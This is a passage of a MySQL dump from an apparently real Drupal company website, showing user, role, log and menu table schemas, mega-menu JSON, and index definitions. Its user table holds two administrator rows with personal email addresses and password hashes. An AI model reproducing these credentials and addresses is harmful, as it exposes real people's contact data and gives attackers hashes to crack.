-- Table structure for table `users_data`
--

CREATE TABLE `users_data` (
  `uid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "users".uid this record affects.',
  `module` varchar(50) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The name of the module declaring the variable.',
  `name` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The identifier of the data.',
  `value` longblob COMMENT 'The value.',
  `serialized` tinyint UNSIGNED DEFAULT '0' COMMENT 'Whether value is serialized.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores module data as key/value pairs per user.';

--
-- Dumping data for table `users_data`
--

INSERT INTO `users_data` (`uid`, `module`, `name`, `value`, `serialized`) VALUES
(1, 'contact', 'enabled', 0x31, 0),
(2, 'contact', 'enabled', 0x31, 0);

-- --------------------------------------------------------

--
-- Table structure for table `users_field_data`
--

CREATE TABLE `users_field_data` (
  `uid` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `preferred_langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `preferred_admin_langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `name` varchar(60) NOT NULL,
  `pass` varchar(255) DEFAULT NULL,
  `mail` varchar(254) DEFAULT NULL,
  `timezone` varchar(32) DEFAULT NULL,
  `status` tinyint DEFAULT NULL,
  `created` int NOT NULL,
  `changed` int DEFAULT NULL,
  `access` int NOT NULL,
  `login` int DEFAULT NULL,
  `init` varchar(254) DEFAULT NULL,
  `default_langcode` tinyint NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for user entities.';

--
-- Dumping data for table `users_field_data`
--

INSERT INTO `users_field_data` (`uid`, `langcode`, `preferred_langcode`, `preferred_admin_langcode`, `name`, `pass`, `mail`, `timezone`, `status`, `created`, `changed`, `access`, `login`, `init`, `default_langcode`) VALUES
(0, 'en', 'en', NULL, '', NULL, NULL, '', 0, 1687189034, 1687189034, 0, 0, NULL, 1),
(1, 'en', 'en', NULL, 'admin', '$S$EmqLQG4VH1hU1dLZs9jLIWW5NnljR8RXNHUW/C9keLIBBgIlnyw1', 'chawchaw.kct@gmail.com', 'Asia/Yangon', 1, 1687189034, 1687405289, 1786708447, 1786704077, 'chawchaw.kct@gmail.com', 1),
(2, 'en', 'en', 'en', 'cometadmin', '$2y$10$F8jLY7eubaqAHgROCbuW1ulopcB1cOinPgHDW.1zhDpeGhGL2Deey', 'chawgyi007@gmail.com', 'Asia/Yangon', 1, 1688193193, 1787017088, 1787925324, 1787836393, 'chawgyi007@gmail.com', 1);

-- --------------------------------------------------------

--
-- Table structure for table `user__roles`
--

CREATE TABLE `user__roles` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to, which for an unversioned entity type is the same as the entity id',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `roles_target_id` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for user field roles.';

--
-- Dumping data for table `user__roles`
--

INSERT INTO `user__roles` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `roles_target_id`) VALUES
('user', 0, 1, 1, 'en', 0, 'administrator'),
('user', 0, 2, 2, 'en', 0, 'administrator');

-- --------------------------------------------------------

--
-- Table structure for table `user__user_picture`
--

CREATE TABLE `user__user_picture` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to, which for an unversioned entity type is the same as the entity id',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `user_picture_target_id` int UNSIGNED NOT NULL COMMENT 'The ID of the file entity.',
  `user_picture_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `user_picture_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `user_picture_width` int UNSIGNED DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `user_picture_height` int UNSIGNED DEFAULT NULL COMMENT 'The height of the image in pixels.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Data storage for user field user_picture.';

-- --------------------------------------------------------

--
-- Table structure for table `watchdog`
--

CREATE TABLE `watchdog` (
  `wid` bigint NOT NULL COMMENT 'Primary Key: Unique watchdog event ID.',
  `uid` int UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The "users".uid of the user who triggered the event.',
  `type` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Type of log message, for example "user" or "page not found."',
  `message` longtext NOT NULL COMMENT 'Text of log message to be passed into the t() function.',
  `variables` longblob NOT NULL COMMENT 'Serialized array of variables that match the message string and that is passed into the t() function.',
  `severity` tinyint UNSIGNED NOT NULL DEFAULT '0' COMMENT 'The severity level of the event. ranges from 0 (Emergency) to 7 (Debug)',
  `link` text COMMENT 'Link to view the result of the event.',
  `location` text NOT NULL COMMENT 'URL of the origin of the event.',
  `referer` text COMMENT 'URL of referring page.',
  `hostname` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'Hostname of the user who triggered the event.',
  `timestamp` bigint NOT NULL DEFAULT '0' COMMENT 'Unix timestamp of when event occurred.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Table that contains logs of all system events.';

-- --------------------------------------------------------

--
-- Table structure for table `we_megamenu`
--

CREATE TABLE `we_megamenu` (
  `menu_name` varchar(150) NOT NULL,
  `theme` varchar(100) NOT NULL,
  `data_config` longtext
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3;

--
-- Dumping data for table `we_megamenu`
--

INSERT INTO `we_megamenu` (`menu_name`, `theme`, `data_config`) VALUES
('main-menu', 'new_comet', '{\"menu_config\":{\"8d1e32fe-2b56-44b2-a354-f0328833fc26\":{\"rows_content\":[[{\"col_config\":{\"hidewhencollapse\":\"\",\"type\":\"we-mega-menu-col\",\"width\":12,\"block\":\"\",\"class\":\"\",\"block_title\":0},\"col_content\":[{\"mlid\":\"08138e1b-68c5-4bc9-bb62-e0fbd4e1a07f\",\"type\":\"we-mega-menu-li\",\"title\":\"Company Profile\",\"item_config\":{}},{\"mlid\":\"72fe5b8c-23a4-4c6e-bb34-d644686ff24a\",\"type\":\"we-mega-menu-li\",\"title\":\"Company History\",\"item_config\":{}},{\"mlid\":\"73e0e9b4-9e96-45aa-83d2-94e731e38630\",\"type\":\"we-mega-menu-li\",\"title\":\"Future Goal\",\"item_config\":{}},{\"mlid\":\"20767e32-de2b-41e9-83e9-2bd0d39d9f9a\",\"type\":\"we-mega-menu-li\",\"title\":\"Vision & Mission\",\"item_config\":{}},{\"mlid\":\"3cb23068-7e7e-44ef-9db2-b0dc9d43d379\",\"type\":\"we-mega-menu-li\",\"title\":\"Our Services\",\"item_config\":{}}]}]],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"8d1e32fe-2b56-44b2-a354-f0328833fc26\",\"submenu\":\"0\",\"hide_sub_when_collapse\":\"\",\"group\":\"0\",\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"0aa87241-461d-4951-9743-cb12de4367ce\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"0aa87241-461d-4951-9743-cb12de4367ce\",\"submenu\":\"0\",\"hide_sub_when_collapse\":\"\",\"group\":\"0\",\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"2c1fc4fa-d805-47d6-bcdb-c2e31674f1fd\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"2c1fc4fa-d805-47d6-bcdb-c2e31674f1fd\",\"submenu\":\"0\",\"hide_sub_when_collapse\":\"\",\"group\":\"0\",\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"feefe983-d4d7-413d-b359-4d5f9649c0a4\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"feefe983-d4d7-413d-b359-4d5f9649c0a4\",\"submenu\":\"0\",\"hide_sub_when_collapse\":\"\",\"group\":\"0\",\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"08138e1b-68c5-4bc9-bb62-e0fbd4e1a07f\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":1,\"type\":\"we-mega-menu-li\",\"id\":\"08138e1b-68c5-4bc9-bb62-e0fbd4e1a07f\",\"title\":\"Company Profile\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"3cb23068-7e7e-44ef-9db2-b0dc9d43d379\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":1,\"type\":\"we-mega-menu-li\",\"id\":\"3cb23068-7e7e-44ef-9db2-b0dc9d43d379\",\"title\":\"Our Services\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"20767e32-de2b-41e9-83e9-2bd0d39d9f9a\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":1,\"type\":\"we-mega-menu-li\",\"id\":\"20767e32-de2b-41e9-83e9-2bd0d39d9f9a\",\"title\":\"Mission & Vision\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"73e0e9b4-9e96-45aa-83d2-94e731e38630\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":1,\"type\":\"we-mega-menu-li\",\"id\":\"73e0e9b4-9e96-45aa-83d2-94e731e38630\",\"title\":\"Future Goal\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"72fe5b8c-23a4-4c6e-bb34-d644686ff24a\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":1,\"type\":\"we-mega-menu-li\",\"id\":\"72fe5b8c-23a4-4c6e-bb34-d644686ff24a\",\"title\":\"Company History\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"f4f34d05-545b-4755-a5c5-934ebbe95d41\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"f4f34d05-545b-4755-a5c5-934ebbe95d41\",\"title\":\"Announcement\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"6bec1422-63fe-47ba-940d-fc00560c2bbe\":{\"rows_content\":[[{\"col_config\":{\"hidewhencollapse\":\"\",\"type\":\"we-mega-menu-col\",\"width\":12,\"block\":\"\",\"class\":\"\",\"block_title\":0},\"col_content\":[{\"mlid\":\"f4f34d05-545b-4755-a5c5-934ebbe95d41\",\"type\":\"we-mega-menu-li\",\"title\":\"Announcement\",\"item_config\":{}},{\"mlid\":\"2c1fc4fa-d805-47d6-bcdb-c2e31674f1fd\",\"type\":\"we-mega-menu-li\",\"title\":\"Activities\",\"item_config\":{}}]}]],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"6bec1422-63fe-47ba-940d-fc00560c2bbe\",\"title\":\"Agencies\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}},\"05809300-6342-4573-88ed-bcb2f43777ba\":{\"rows_content\":[],\"submenu_config\":{\"width\":\"\",\"class\":\"\",\"type\":\"\"},\"item_config\":{\"level\":0,\"type\":\"we-mega-menu-li\",\"id\":\"05809300-6342-4573-88ed-bcb2f43777ba\",\"title\":\"Language Center\",\"submenu\":0,\"hide_sub_when_collapse\":\"\",\"group\":0,\"class\":\"\",\"data-icon\":\"\",\"data-caption\":\"\",\"data-alignsub\":\"\",\"data-target\":\"\"}}},\"block_config\":{\"style\":\"Default\",\"animation\":\"None\",\"delay\":\"\",\"duration\":\"\",\"auto-arrow\":\"1\",\"always-show-submenu\":\"1\",\"action\":\"hover\",\"auto-mobile-collapse\":\"1\"},\"menu_update_flag\":0}');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `batch`
--
ALTER TABLE `batch`
  ADD PRIMARY KEY (`bid`),
  ADD KEY `token` (`token`);

--
-- Indexes for table `block_content`
--
ALTER TABLE `block_content`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `block_content_field__uuid__value` (`uuid`),
  ADD UNIQUE KEY `block_content__revision_id` (`revision_id`),
  ADD KEY `block_content_field__type__target_id` (`type`);

--
-- Indexes for table `block_content_field_data`
--
ALTER TABLE `block_content_field_data`
  ADD PRIMARY KEY (`id`,`langcode`),
  ADD KEY `block_content__id__default_langcode__langcode` (`id`,`default_langcode`,`langcode`),
  ADD KEY `block_content__revision_id` (`revision_id`),
  ADD KEY `block_content_field__type__target_id` (`type`),
  ADD KEY `block_content__status_type` (`status`,`type`,`id`),
  ADD KEY `block_content__a2de77f2fa` (`content_translation_uid`),
  ADD KEY `block_content_field__reusable` (`reusable`);

--
-- Indexes for table `block_content_field_revision`
--
ALTER TABLE `block_content_field_revision`
  ADD PRIMARY KEY (`revision_id`,`langcode`),
  ADD KEY `block_content__id__default_langcode__langcode` (`id`,`default_langcode`,`langcode`),
  ADD KEY `block_content__a2de77f2fa` (`content_translation_uid`);

--
-- Indexes for table `block_content_revision`
--
ALTER TABLE `block_content_revision`
  ADD PRIMARY KEY (`revision_id`),
  ADD KEY `block_content__id` (`id`),
  ADD KEY `block_content_field__revision_user__target_id` (`revision_user`);

--
-- Indexes for table `block_content_revision__body`
--
ALTER TABLE `block_content_revision__body`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `body_format` (`body_format`);

--
-- Indexes for table `block_content__body`
--
ALTER TABLE `block_content__body`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `body_format` (`body_format`);

--
-- Indexes for table `cachetags`
--
ALTER TABLE `cachetags`
  ADD PRIMARY KEY (`tag`);

--
-- Indexes for table `cache_access_policy`
--
ALTER TABLE `cache_access_policy`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_bootstrap`
--
ALTER TABLE `cache_bootstrap`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_config`
--
ALTER TABLE `cache_config`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_container`
--
ALTER TABLE `cache_container`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_data`
--
ALTER TABLE `cache_data`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_default`
--
ALTER TABLE `cache_default`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_discovery`
--
ALTER TABLE `cache_discovery`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_dynamic_page_cache`
--
ALTER TABLE `cache_dynamic_page_cache`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_entity`
--
ALTER TABLE `cache_entity`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_menu`
--
ALTER TABLE `cache_menu`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_page`
--
ALTER TABLE `cache_page`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_render`
--
ALTER TABLE `cache_render`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `cache_toolbar`
--
ALTER TABLE `cache_toolbar`
  ADD PRIMARY KEY (`cid`),
  ADD KEY `expire` (`expire`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `captcha_sessions`
--
ALTER TABLE `captcha_sessions`
  ADD PRIMARY KEY (`csid`),
  ADD KEY `csid_ip` (`csid`,`ip_address`);

--
-- Indexes for table `comment`
--
ALTER TABLE `comment`
  ADD PRIMARY KEY (`cid`),
  ADD UNIQUE KEY `comment_field__uuid__value` (`uuid`),
  ADD KEY `comment_field__comment_type__target_id` (`comment_type`);

--
-- Indexes for table `comment_entity_statistics`
--
ALTER TABLE `comment_entity_statistics`
  ADD PRIMARY KEY (`entity_id`,`entity_type`,`field_name`),
  ADD KEY `last_comment_timestamp` (`last_comment_timestamp`),
  ADD KEY `comment_count` (`comment_count`),
  ADD KEY `last_comment_uid` (`last_comment_uid`);

--
-- Indexes for table `comment_field_data`
--
ALTER TABLE `comment_field_data`
  ADD PRIMARY KEY (`cid`,`langcode`),
  ADD KEY `comment__id__default_langcode__langcode` (`cid`,`default_langcode`,`langcode`),
  ADD KEY `comment_field__comment_type__target_id` (`comment_type`),
  ADD KEY `comment_field__uid__target_id` (`uid`),
  ADD KEY `comment_field__created` (`created`),
  ADD KEY `comment__status_comment_type` (`status`,`comment_type`,`cid`),
  ADD KEY `comment__status_pid` (`pid`,`status`),
  ADD KEY `comment__num_new` (`entity_id`,`entity_type`,`comment_type`,`status`,`created`,`cid`,`thread`(191)),
  ADD KEY `comment__entity_langcode` (`entity_id`,`entity_type`,`comment_type`,`default_langcode`);

--
-- Indexes for table `comment__comment_body`
--
ALTER TABLE `comment__comment_body`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `comment_body_format` (`comment_body_format`);

--
-- Indexes for table `config`
--
ALTER TABLE `config`
  ADD PRIMARY KEY (`collection`,`name`);

--
-- Indexes for table `file_managed`
--
ALTER TABLE `file_managed`
  ADD PRIMARY KEY (`fid`),
  ADD UNIQUE KEY `file_field__uuid__value` (`uuid`),
  ADD KEY `file_field__uid__target_id` (`uid`),
  ADD KEY `file_field__uri` (`uri`(191)),
  ADD KEY `file_field__status` (`status`),
  ADD KEY `file_field__changed` (`changed`);

--
-- Indexes for table `file_usage`
--
ALTER TABLE `file_usage`
  ADD PRIMARY KEY (`fid`,`type`,`id`,`module`),
  ADD KEY `type_id` (`type`,`id`),
  ADD KEY `fid_count` (`fid`,`count`),
  ADD KEY `fid_module` (`fid`,`module`);

--
-- Indexes for table `flood`
--
ALTER TABLE `flood`
  ADD PRIMARY KEY (`fid`),
  ADD KEY `allow` (`event`,`identifier`,`timestamp`),
  ADD KEY `purge` (`expiration`);

--
-- Indexes for table `help_search_items`
--
ALTER TABLE `help_search_items`
  ADD PRIMARY KEY (`sid`),
  ADD KEY `section_plugin_id` (`section_plugin_id`),
  ADD KEY `topic_id` (`topic_id`);

--
-- Indexes for table `history`
--
ALTER TABLE `history`
  ADD PRIMARY KEY (`uid`,`nid`),
  ADD KEY `nid` (`nid`);

--
-- Indexes for table `key_value`
--
ALTER TABLE `key_value`
  ADD PRIMARY KEY (`collection`,`name`);

--
-- Indexes for table `key_value_expire`
--
ALTER TABLE `key_value_expire`
  ADD PRIMARY KEY (`collection`,`name`),
  ADD KEY `expire` (`expire`);

--
-- Indexes for table `locales_location`
--
ALTER TABLE `locales_location`
  ADD PRIMARY KEY (`lid`),
  ADD KEY `string_type` (`sid`,`type`),
  ADD KEY `type_name` (`type`,`name`(191));

--
-- Indexes for table `locales_source`
--
ALTER TABLE `locales_source`
  ADD PRIMARY KEY (`lid`),
  ADD KEY `source_context` (`source`(30),`context`);

--
-- Indexes for table `locales_target`
--
ALTER TABLE `locales_target`
  ADD PRIMARY KEY (`language`,`lid`),
  ADD KEY `lid` (`lid`);

--
-- Indexes for table `locale_file`
--
ALTER TABLE `locale_file`
  ADD PRIMARY KEY (`project`,`langcode`);

--
-- Indexes for table `media`
--
ALTER TABLE `media`
  ADD PRIMARY KEY (`mid`),
  ADD UNIQUE KEY `media_field__uuid__value` (`uuid`),
  ADD UNIQUE KEY `media__vid` (`vid`),
  ADD KEY `media_field__bundle__target_id` (`bundle`);

--
-- Indexes for table `media_field_data`
--
ALTER TABLE `media_field_data`
  ADD PRIMARY KEY (`mid`,`langcode`),
  ADD KEY `media__id__default_langcode__langcode` (`mid`,`default_langcode`,`langcode`),
  ADD KEY `media__vid` (`vid`),
  ADD KEY `media_field__bundle__target_id` (`bundle`),
  ADD KEY `media_field__uid__target_id` (`uid`),
  ADD KEY `media_field__thumbnail__target_id` (`thumbnail__target_id`),
  ADD KEY `media__status_bundle` (`status`,`bundle`,`mid`);

--
-- Indexes for table `media_field_revision`
--
ALTER TABLE `media_field_revision`
  ADD PRIMARY KEY (`vid`,`langcode`),
  ADD KEY `media__id__default_langcode__langcode` (`mid`,`default_langcode`,`langcode`),
  ADD KEY `media_field__uid__target_id` (`uid`),
  ADD KEY `media_field__thumbnail__target_id` (`thumbnail__target_id`);

--
-- Indexes for table `media_revision`
--
ALTER TABLE `media_revision`
  ADD PRIMARY KEY (`vid`),
  ADD KEY `media__mid` (`mid`),
  ADD KEY `media_field__revision_user__target_id` (`revision_user`);

--
-- Indexes for table `media_revision__field_media_audio_file`
--
ALTER TABLE `media_revision__field_media_audio_file`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_audio_file_target_id` (`field_media_audio_file_target_id`);

--
-- Indexes for table `media_revision__field_media_document`
--
ALTER TABLE `media_revision__field_media_document`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_document_target_id` (`field_media_document_target_id`);

--
-- Indexes for table `media_revision__field_media_image`
--
ALTER TABLE `media_revision__field_media_image`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_image_target_id` (`field_media_image_target_id`);

--
-- Indexes for table `media_revision__field_media_oembed_video`
--
ALTER TABLE `media_revision__field_media_oembed_video`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`);

--
-- Indexes for table `media_revision__field_media_video_file`
--
ALTER TABLE `media_revision__field_media_video_file`
  ADD PRIMARY KEY (`entity_id`,`revision_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_video_file_target_id` (`field_media_video_file_target_id`);

--
-- Indexes for table `media__field_media_audio_file`
--
ALTER TABLE `media__field_media_audio_file`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_audio_file_target_id` (`field_media_audio_file_target_id`);

--
-- Indexes for table `media__field_media_document`
--
ALTER TABLE `media__field_media_document`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_document_target_id` (`field_media_document_target_id`);

--
-- Indexes for table `media__field_media_image`
--
ALTER TABLE `media__field_media_image`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_image_target_id` (`field_media_image_target_id`);

--
-- Indexes for table `media__field_media_oembed_video`
--
ALTER TABLE `media__field_media_oembed_video`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`);

--
-- Indexes for table `media__field_media_video_file`
--
ALTER TABLE `media__field_media_video_file`
  ADD PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  ADD KEY `bundle` (`bundle`),
  ADD KEY `revision_id` (`revision_id`),
  ADD KEY `field_media_video_file_target_id` (`field_media_video_file_target_id`);

--
-- Indexes for table `menu_link_content`
--
ALTER TABLE `menu_link_content`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `menu_link_content_field__uuid__value` (`uuid`),
  ADD UNIQUE KEY `menu_link_content__revision_id` (`revision_id`);

--
-- Indexes for table `menu_link_content_data`
--
ALTER TABLE `menu_link_content_data`
  ADD PRIMARY KEY (`id`,`langcode`),
  ADD KEY `menu_link_content__id__default_langcode__langcode` (`id`,`default_langcode`,`langcode`),
  ADD KEY `menu_link_content__revision_id` (`revision_id`),
  ADD KEY `menu_link_content_field__link__uri` (`link__uri`(30)),
  ADD KEY `menu_link_content__enabled_bundle` (`enabled`,`bundle`,`id`),
  ADD KEY `menu_link_content__c97403a52f` (`content_translation_uid`);

--
-- Indexes for table `menu_link_content_field_revision`
--
ALTER TABLE `menu_link_content_field_revision`
  ADD PRIMARY KEY (`revision_id`,`langcode`),
  ADD KEY `menu_link_content__id__default_langcode__langcode` (`id`,`default_langcode`,`langcode`),
  ADD KEY `menu_link_content_field__link__uri` (`link__uri`(30)),
  ADD KEY `menu_link_content__c97403a52f` (`content_translation_uid`);

--
-- Indexes for table `menu_link_content_revision`
--
ALTER TABLE `menu_link_content_revision`
  ADD PRIMARY KEY (`revision_id`),
  ADD KEY `menu_link_content__id` (`id`),
  ADD KEY `menu_link_content__ef029a1897` (`revision_user`);

--
-- Indexes for table `menu_tree`
--
ALTER TABLE `menu_tree`
  ADD PRIMARY KEY (`mlid`),
  ADD UNIQUE KEY `id` (`id`),
  ADD KEY `menu_parents` (`menu_name`,`p1`,`p2`,`p3`,`p4`,`p5`,`p6`,`p7`,`p8`,`p9`),
  ADD KEY `menu_parent_expand_child` (`menu_name`,`expanded`,`has_children`,`parent`(16)),
  ADD KEY `route_values` (`route_name`(32),`route_param_key`(16));

--
-- Indexes for table `node`
--
ALTER TABLE `node`
  ADD PRIMARY KEY (`nid`),
  ADD UNIQUE KEY `node_field__uuid__value` (`uuid`),
  ADD UNIQUE KEY `node__vid` (`vid`),
